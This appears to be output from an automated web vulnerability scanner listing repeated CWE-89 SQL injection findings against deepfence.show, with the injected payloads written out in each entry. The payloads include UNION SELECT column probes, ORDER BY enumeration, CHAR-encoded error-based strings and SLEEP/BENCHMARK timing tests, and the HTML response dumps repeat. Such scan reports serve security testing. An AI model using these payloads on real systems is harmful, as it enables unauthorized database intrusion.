CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1340Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1341\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1342\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1343\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1344\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1345\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1346\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1347\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1348\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+\nCHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1349\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1350\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1351\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1352\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1353\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 